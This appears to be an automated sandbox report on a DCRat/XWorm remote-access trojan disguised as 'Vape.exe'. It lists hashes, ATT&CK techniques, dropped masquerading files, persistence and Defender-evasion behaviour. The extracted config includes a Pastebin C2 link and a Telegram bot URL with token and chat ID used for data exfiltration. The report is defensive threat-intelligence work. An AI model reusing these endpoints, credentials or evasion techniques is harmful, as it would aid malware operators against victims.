dcrat | 66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b

Analysis

max time kernel
1800s
max time network
1797s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
22-05-2024 13:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Vape.exe
Size

16.9MB
MD5

b682cd3286eb0cd188dc896d6fd7fa0c
SHA1

f6f15cbc94072cbdab5ae4548c4b13d787f6f617
SHA256

66ac4015c48cc00c995fc8910d09e2ccc0b559785fc52a959a4d2de9fdb8c62b
SHA512

a30ada153f1c2ead70bbe27b3bb770512d04b469ec3e3f19266f81cd06150e1297e06877c5ed899040a7a760d64d24892477df17294721fd8560082a634ce2f5
SSDEEP

393216:61HGgtq8HRisK/m6Smj8xBPKEUVrHCKAfcI:6tGOqKRO/9Smj8bPsxsfcI

Score

10^/10

dcrat xworm evasion execution infostealer persistence rat trojan upx

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
Microsoft_WindowsDefender.exe
pastebin_url
https://pastebin.com/raw/dxKNAdeE
telegram
https://api.telegram.org/bot7013809678:AAEFwh-OW3w4YnEldOGR6NvGudG5gj8iF0Q/sendMessage?chat_id=5073217277

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Deletes Windows Defender Definitions 2 TTPs 2 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

Processes:

MpCmdRun.exeMpCmdRun.exe

pid process

4296 MpCmdRun.exe
492 MpCmdRun.exe

pid	process
4296	MpCmdRun.exe
492	MpCmdRun.exe

Detect Xworm Payload 9 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Msvchost.exe	family_xworm
behavioral3/memory/3456-91-0x00000000007D0000-0x00000000007E8000-memory.dmp	family_xworm
behavioral3/memory/1768-1666-0x0000000000BF0000-0x0000000000C08000-memory.dmp	family_xworm
behavioral3/memory/4448-1766-0x0000000000640000-0x0000000000658000-memory.dmp	family_xworm
behavioral3/memory/1068-1875-0x0000000000370000-0x0000000000388000-memory.dmp	family_xworm
behavioral3/memory/708-1980-0x0000000000260000-0x0000000000278000-memory.dmp	family_xworm
behavioral3/memory/5660-2073-0x0000000000600000-0x0000000000618000-memory.dmp	family_xworm
behavioral3/memory/5796-2208-0x0000000000FF0000-0x0000000001008000-memory.dmp	family_xworm
behavioral3/memory/6248-2324-0x0000000000E40000-0x0000000000E58000-memory.dmp	family_xworm

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3688	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3532	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	68	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3808	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	652	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2144	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2572	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	828	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4428	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4796	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3492	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4212	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	968	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1336	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2088	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	428	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1784	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4904	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4272	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1240	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	3060	schtasks.exe	wmiprvse.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	196	3060	schtasks.exe	wmiprvse.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 9 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe	dcrat
behavioral3/memory/4996-730-0x0000000000DA0000-0x0000000000F2C000-memory.dmp	dcrat
C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe	dcrat
behavioral3/memory/4756-1608-0x0000000000DF0000-0x0000000000F7C000-memory.dmp	dcrat
behavioral3/memory/5740-2085-0x0000000000770000-0x00000000008FC000-memory.dmp	dcrat
behavioral3/memory/5828-2093-0x0000000000DB0000-0x0000000000F3C000-memory.dmp	dcrat
behavioral3/memory/5908-2216-0x0000000000CC0000-0x0000000000E4C000-memory.dmp	dcrat
behavioral3/memory/6336-2335-0x0000000000140000-0x00000000002CC000-memory.dmp	dcrat
behavioral3/memory/6456-2466-0x0000000000E70000-0x0000000000FFC000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

3344 powershell.exe
392 powershell.exe
1012 powershell.exe
1896 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3344	powershell.exe
392	powershell.exe
1012	powershell.exe
1896	powershell.exe

Drops startup file 2 IoCs

Processes:

Msvchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk	Msvchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft_WindowsDefender.lnk	Msvchost.exe

Executes dropped EXE 53 IoCs

Processes:

Microsoft_Protection.exeMicrosoft_crypt.exeMicrosoft_R.exeMicrosoft_R.exeMicrosoft_M.exeMsvchost.exeMicrosoft_M.exelhhsgwktkatl.exeIntoref.execsrss.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.exeMicrosoft_WindowsDefender.execsrss.execmd.exeMicrosoft_WindowsDefender.exeWmiPrvSE.exeMicrosoft_WindowsDefender.exeApplicationFrameHost.exesc.exedllhost.execsrss.execmd.exeexplorer.exeOfficeClickToRun.exewininit.exeWmiPrvSE.exeunsecapp.exeApplicationFrameHost.execsrss.execmd.exesc.exedllhost.exeWmiPrvSE.execsrss.execmd.exeexplorer.exeApplicationFrameHost.exeOfficeClickToRun.exewininit.exesc.exeWmiPrvSE.exeunsecapp.execsrss.execmd.exedllhost.exeApplicationFrameHost.execsrss.execmd.exeWmiPrvSE.exeexplorer.exe

pid	process
660	Microsoft_Protection.exe
4680	Microsoft_crypt.exe
5088	Microsoft_R.exe
4660	Microsoft_R.exe
4752	Microsoft_M.exe
3456	Msvchost.exe
4856	Microsoft_M.exe
1208	lhhsgwktkatl.exe
4996	Intoref.exe
4756	csrss.exe
1768	Microsoft_WindowsDefender.exe
4448	Microsoft_WindowsDefender.exe
1068	Microsoft_WindowsDefender.exe
708	Microsoft_WindowsDefender.exe
5660	Microsoft_WindowsDefender.exe
5740	csrss.exe
5828	cmd.exe
5796	Microsoft_WindowsDefender.exe
5908	WmiPrvSE.exe
6248	Microsoft_WindowsDefender.exe
6336	ApplicationFrameHost.exe
6456	sc.exe
7132	dllhost.exe
6296	csrss.exe
3612	cmd.exe
7236	explorer.exe
7888	OfficeClickToRun.exe
7980	wininit.exe
7900	WmiPrvSE.exe
8148	unsecapp.exe
8196	ApplicationFrameHost.exe
8852	csrss.exe
8940	cmd.exe
8964	sc.exe
9756	dllhost.exe
9844	WmiPrvSE.exe
10272	csrss.exe
10356	cmd.exe
10468	explorer.exe
11108	ApplicationFrameHost.exe
11052	OfficeClickToRun.exe
11136	wininit.exe
11736	sc.exe
11820	WmiPrvSE.exe
11892	unsecapp.exe
11884	csrss.exe
11740	cmd.exe
12848	dllhost.exe
12792	ApplicationFrameHost.exe
13936	csrss.exe
13984	cmd.exe
14080	WmiPrvSE.exe
14152	explorer.exe

Loads dropped DLL 33 IoCs

Processes:

Microsoft_R.exeMicrosoft_M.exe

pid	process
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4660	Microsoft_R.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe
4856	Microsoft_M.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI50882\python311.dll	upx
behavioral3/memory/4660-61-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\_MEI47522\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50882\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50882\_ssl.pyd	upx
behavioral3/memory/4660-125-0x00007FFCA7090000-0x00007FFCA709F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47522\libffi-8.dll	upx
behavioral3/memory/4856-148-0x00007FFCA6430000-0x00007FFCA643F000-memory.dmp	upx
behavioral3/memory/4856-147-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47522\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47522\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47522\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI47522\_lzma.pyd	upx
behavioral3/memory/4660-157-0x00007FFCA2F90000-0x00007FFCA3100000-memory.dmp	upx
behavioral3/memory/4856-162-0x00007FFCA3AD0000-0x00007FFCA3AFD000-memory.dmp	upx
behavioral3/memory/4660-164-0x00007FFCA36A0000-0x00007FFCA36AD000-memory.dmp	upx
behavioral3/memory/4660-166-0x00007FFCA3380000-0x00007FFCA3438000-memory.dmp	upx
behavioral3/memory/4856-171-0x00007FFCA2E20000-0x00007FFCA2F90000-memory.dmp	upx
behavioral3/memory/4660-181-0x00007FFC8E210000-0x00007FFC8E32C000-memory.dmp	upx
behavioral3/memory/4856-184-0x00007FFCA2D30000-0x00007FFCA2D3D000-memory.dmp	upx
behavioral3/memory/4856-186-0x00007FFC8E0F0000-0x00007FFC8E20C000-memory.dmp	upx
behavioral3/memory/4856-185-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp	upx
behavioral3/memory/4856-183-0x00007FFCA2D40000-0x00007FFCA2D54000-memory.dmp	upx
behavioral3/memory/4660-182-0x00007FFCA6470000-0x00007FFCA6493000-memory.dmp	upx
behavioral3/memory/4856-233-0x00007FFC8E0F0000-0x00007FFC8E20C000-memory.dmp	upx
behavioral3/memory/4660-285-0x00007FFCA2F90000-0x00007FFCA3100000-memory.dmp	upx
behavioral3/memory/4660-297-0x00007FFCA2DC0000-0x00007FFCA2DCD000-memory.dmp	upx
behavioral3/memory/4660-298-0x00007FFC8E210000-0x00007FFC8E32C000-memory.dmp	upx
behavioral3/memory/4660-296-0x00007FFCA2E00000-0x00007FFCA2E14000-memory.dmp	upx
behavioral3/memory/4660-295-0x00007FFC8E6B0000-0x00007FFC8EA29000-memory.dmp	upx
behavioral3/memory/4660-294-0x00007FFCA3380000-0x00007FFCA3438000-memory.dmp	upx
behavioral3/memory/4660-293-0x00007FFCA3670000-0x00007FFCA369E000-memory.dmp	upx
behavioral3/memory/4660-292-0x00007FFCA36A0000-0x00007FFCA36AD000-memory.dmp	upx
behavioral3/memory/4660-291-0x00007FFCA3AB0000-0x00007FFCA3AC9000-memory.dmp	upx
behavioral3/memory/4660-290-0x00007FFCA6330000-0x00007FFCA6353000-memory.dmp	upx
behavioral3/memory/4660-289-0x00007FFCA63E0000-0x00007FFCA63F9000-memory.dmp	upx
behavioral3/memory/4660-288-0x00007FFCA6400000-0x00007FFCA642D000-memory.dmp	upx
behavioral3/memory/4660-287-0x00007FFCA7090000-0x00007FFCA709F000-memory.dmp	upx
behavioral3/memory/4660-286-0x00007FFCA6470000-0x00007FFCA6493000-memory.dmp	upx
behavioral3/memory/4660-254-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp	upx
behavioral3/memory/4856-245-0x00007FFC8E330000-0x00007FFC8E6A9000-memory.dmp	upx
behavioral3/memory/4856-244-0x00007FFCA1680000-0x00007FFCA1738000-memory.dmp	upx
behavioral3/memory/4856-243-0x00007FFCA3370000-0x00007FFCA337D000-memory.dmp	upx
behavioral3/memory/4856-242-0x00007FFCA3600000-0x00007FFCA3619000-memory.dmp	upx
behavioral3/memory/4856-241-0x00007FFCA3620000-0x00007FFCA3643000-memory.dmp	upx
behavioral3/memory/4856-240-0x00007FFCA3650000-0x00007FFCA3669000-memory.dmp	upx
behavioral3/memory/4856-239-0x00007FFCA2E20000-0x00007FFCA2F90000-memory.dmp	upx
behavioral3/memory/4856-238-0x00007FFCA3AD0000-0x00007FFCA3AFD000-memory.dmp	upx
behavioral3/memory/4856-237-0x00007FFC8EA30000-0x00007FFC8F019000-memory.dmp	upx
behavioral3/memory/4856-236-0x00007FFCA6430000-0x00007FFCA643F000-memory.dmp	upx
behavioral3/memory/4856-235-0x00007FFCA6440000-0x00007FFCA6463000-memory.dmp	upx
behavioral3/memory/4856-234-0x00007FFCA2DD0000-0x00007FFCA2DFE000-memory.dmp	upx
behavioral3/memory/4856-232-0x00007FFCA2D30000-0x00007FFCA2D3D000-memory.dmp	upx
behavioral3/memory/4856-231-0x00007FFCA2D40000-0x00007FFCA2D54000-memory.dmp	upx
behavioral3/memory/4856-180-0x00007FFCA2DD0000-0x00007FFCA2DFE000-memory.dmp	upx
behavioral3/memory/4856-179-0x00007FFCA1680000-0x00007FFCA1738000-memory.dmp	upx
behavioral3/memory/4856-178-0x00007FFC8E330000-0x00007FFC8E6A9000-memory.dmp	upx
behavioral3/memory/4660-177-0x00007FFCA2DC0000-0x00007FFCA2DCD000-memory.dmp	upx
behavioral3/memory/4856-176-0x00007FFCA3370000-0x00007FFCA337D000-memory.dmp	upx
behavioral3/memory/4660-175-0x00007FFCA2E00000-0x00007FFCA2E14000-memory.dmp	upx
behavioral3/memory/4856-174-0x00007FFCA3600000-0x00007FFCA3619000-memory.dmp	upx
behavioral3/memory/4856-173-0x00007FFC8EA30000-0x00007FFC8F019000-memory.dmp	upx
behavioral3/memory/4660-172-0x00007FFC8F020000-0x00007FFC8F609000-memory.dmp	upx
behavioral3/memory/4856-170-0x00007FFCA3620000-0x00007FFCA3643000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Msvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft_WindowsDefender = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft_WindowsDefender.exe"	Msvchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

3 pastebin.com
4 pastebin.com
12 pastebin.com

flow	ioc
3	pastebin.com
4	pastebin.com
12	pastebin.com

Drops file in System32 directory 38 IoCs

Processes:

svchost.exelhhsgwktkatl.exeOfficeClickToRun.exesvchost.exesvchost.exeMicrosoft_crypt.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\wininitw	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhostd	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\cmd	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\csrssc	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OfficeClickToRun	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\wininit	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dllhost	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\scs	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\unsecappu	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\explorer	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\unsecapp	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	lhhsgwktkatl.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSE	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OfficeClickToRunO	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\sc	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\WmiPrvSEW	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	Microsoft_crypt.exe
File opened for modification	C:\Windows\System32\Tasks\csrss	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\cmdc	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\explorere	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\ApplicationFrameHost	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\ApplicationFrameHostA	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Microsoft_crypt.exelhhsgwktkatl.exe

description	pid	process	target process
PID 4680 set thread context of 2932	4680	Microsoft_crypt.exe	dialer.exe
PID 1208 set thread context of 3532	1208	lhhsgwktkatl.exe	dialer.exe
PID 1208 set thread context of 3592	1208	lhhsgwktkatl.exe	dialer.exe
PID 1208 set thread context of 1592	1208	lhhsgwktkatl.exe	Conhost.exe

Drops file in Program Files directory 20 IoCs

Processes:

Intoref.exe

description	ioc	process
File created	C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e	Intoref.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\09183ef8b9d885	Intoref.exe
File created	C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe	Intoref.exe
File created	C:\Program Files (x86)\Windows Defender\uk-UA\886983d96e3d3e	Intoref.exe
File created	C:\Program Files\Windows NT\TableTextService\unsecapp.exe	Intoref.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe	Intoref.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\886983d96e3d3e	Intoref.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\7a0fd90576e088	Intoref.exe
File created	C:\Program Files\Windows NT\TableTextService\29c1c3cc0f7685	Intoref.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe	Intoref.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe	Intoref.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe	Intoref.exe
File created	C:\Program Files\Internet Explorer\uk-UA\6dd19aba3e2428	Intoref.exe
File created	C:\Program Files\WindowsApps\Deleted\services.exe	Intoref.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\24dbde2999530e	Intoref.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe	Intoref.exe
File created	C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe	Intoref.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\24dbde2999530e	Intoref.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\explorer.exe	Intoref.exe
File created	C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	Intoref.exe

Drops file in Windows directory 5 IoCs

Processes:

Intoref.exe

description	ioc	process
File created	C:\Windows\Boot\Resources\SearchUI.exe	Intoref.exe
File created	C:\Windows\Globalization\ELS\dllhost.exe	Intoref.exe
File created	C:\Windows\Globalization\ELS\5940a34987c991	Intoref.exe
File created	C:\Windows\servicing\SQM\dllhost.exe	Intoref.exe
File created	C:\Windows\rescache\RuntimeBroker.exe	Intoref.exe

Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4320 sc.exe
6456 sc.exe
8964 sc.exe
11736 sc.exe
1316 sc.exe
4284 sc.exe
2704 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4320	sc.exe
6456	sc.exe
8964	sc.exe
11736	sc.exe
1316	sc.exe
4284	sc.exe
2704	sc.exe

Checks SCSI registry key(s) 3 TTPs 26 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
